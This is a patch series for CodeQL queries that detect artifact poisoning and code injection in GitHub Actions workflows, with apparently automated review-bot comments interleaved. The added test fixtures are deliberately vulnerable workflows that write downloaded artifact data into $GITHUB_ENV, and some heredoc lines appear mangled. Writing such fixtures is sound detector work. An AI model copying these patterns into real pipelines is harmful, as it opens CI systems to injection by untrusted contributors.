controlled by an external user. 
| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml index ca074428ccfa..71f590fbc9c7 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -18,7 +18,3 @@ jobs: - name: Env Var Injection run: | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV - - - - diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 000000000000..130668b8515d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml 
@@ -0,0 +1,27 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - name: Env Var Injection
+ run: |
+ echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"
+ ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}"
+ ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}"
+ echo "EOF" >> "${GITHUB_ENV}"
+
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml
new file mode 100644
index 000000000000..7c255e7722d8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml
@@ -0,0 +1,27 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - run: |
+ {
+ echo 'JSON_RESPONSE<> "$GITHUB_ENV"
+
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
index 907979b88e7c..ab07d0a2f383 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
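Review bot: The two `ls | grep -E` lines in the `Env Var Injection` step list the workspace root rather than `foo/`, where the `Unzip` step extracted the artifact, so what reaches `${GITHUB_ENV}` is the runner's own entries (`artifact_name.zip`, `foo`) and not names taken from the artifact; if the fixture is meant to model artifact contents flowing into the environment file, `ls foo | grep -E '\.(tar\.gz|zip)$' >> "${GITHUB_ENV}"` (and the same for the `txt|md` line) expresses that. As written the pattern `"*.(tar.gz|zip)$"` also starts with a bare `*` and leaves the dots unescaped, so it does not filter by extension. The heredoc opener shows here as `PACKAGES_FILE_LIST<>`, presumably a rendering of `<<EOF`; I could not verify the full step text from this view.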
@@ -8,3 +8,5 @@
 | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. |
 | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. |
 | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | Potential artifact poisoning. |
From ed70ef03078077d943baebd2e4480db9b6830b17 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 11 Apr 2024 15:46:49 +0200
Subject: [PATCH 167/707] Make Artifact poisoning query a path problem
---
 ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +-
 .../security/ArtifactPoisoningQuery.qll | 21 +
 ql/src/Security/CWE-829/ArtifactPoisoning.ql | 24 +-
 .../CWE-829/PrivilegedArtifactPoisoning.ql | 27 ++
 ql/test/library-tests/test.expected | 448 +-----------------
 .../CWE-829/ArtifactPoisoning.expected | 52 +-
 .../PrivilegedArtifactPoisoning.expected | 52 ++
 .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 +
 8 files changed, 166 insertions(+), 476 deletions(-)
 create mode 100644 ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql
 create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected
 create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index 0fd3f82b2f7f..3988f2190ab2 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
@@ -82,22 +82,18 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da
 }
 /**
- * A downloaded artifact that gets assigned to an env var declaration.
- * - uses: actions/download-artifact@v2
- * - run: echo "::set-env name=id::$(;
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql
index bd9ec090f7f9..6d3910e2ca5c 100644
--- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql
+++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql
@@ -1,9 +1,9 @@
 /**
 * @name Artifact poisoning
 * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps.
- * @kind problem
+ * @kind path-problem
 * @problem.severity warning
- * @precision medium
+ * @precision high
 * @security-severity 9.3
 * @id actions/artifact-poisoning
 * @tags actions
@@ -13,11 +13,19 @@
 import actions
 import codeql.actions.security.ArtifactPoisoningQuery
+import ArtifactPoisoningFlow::PathGraph
-from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step
+from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink
 where
- // Workflow is privileged
- job.getWorkflow().isPrivileged() and
- // Download step is followed by a step that may be poisoned by the download
- downloadStep.getAFollowingStep() = step
-select downloadStep, "Potential artifact poisoning."
+ ArtifactPoisoningFlow::flowPath(source, sink) and
+ (
+ exists(source.getNode().asExpr().getEnclosingCompositeAction())
+ or
+ exists(Workflow w |
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ not w.isPrivileged()
+ )
+ )
+select sink.getNode(), source, sink,
+ "Potential artifact poisoning in $@, which may be controlled by an external user.", sink,
+ sink.getNode().toString()
diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql
new file mode 100644
index 000000000000..cd6d5eeb1089
--- /dev/null
+++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql
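Review bot: `@security-severity 9.3` survives as a context line on a query that the new `not w.isPrivileged()` condition in the second hunk confines to non-privileged workflows and composite actions, while the privileged variant introduced in the next hunk (PrivilegedArtifactPoisoning.ql) carries `@security-severity 9`, so the less dangerous case now scores higher than the `@problem.severity error` one; keep 9.3 on the privileged query and give this one a lower value. The `@precision medium` → `high` bump in the first hunk is not explained by the commit message, which only describes the path-problem conversion, so either justify it there or leave it until the split has settled. The `@description` reads `influence on consequent steps`; `influence subsequent steps` is the intended wording, and the same text recurs in the new query.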
@@ -0,0 +1,27 @@
+/**
+ * @name Artifact poisoning
+ * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9
+ * @id actions/privileged-artifact-poisoning
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.ArtifactPoisoningQuery
+import ArtifactPoisoningFlow::PathGraph
+
+from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink
+where
+ ArtifactPoisoningFlow::flowPath(source, sink) and
+ exists(Workflow w |
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ w.isPrivileged()
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged artifact poisoning in $@, which may be controlled by an external user.",
+ sink, sink.getNode().toString()
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index aa2ccdcfe9c0..a6be2226b8c3 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
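Review bot: `@name Artifact poisoning` duplicates the name of ArtifactPoisoning.ql, so the two rules are told apart only by `@id` in result listings; `@name Privileged artifact poisoning` would match the message on the `select` line. The `where` clause admits only sources whose `getEnclosingWorkflow()` is privileged, so a source inside a composite action is never reported here and is left to the sibling query; a comment above `exists(Workflow w |` such as `// composite actions are reported by ArtifactPoisoning.ql; only privileged workflows are in scope here` would make that division visible to the next reader.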
@@ -1,446 +1,2 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | 
.github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | 
.github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| 
.github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: 
issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | 
.github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | 
.github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| 
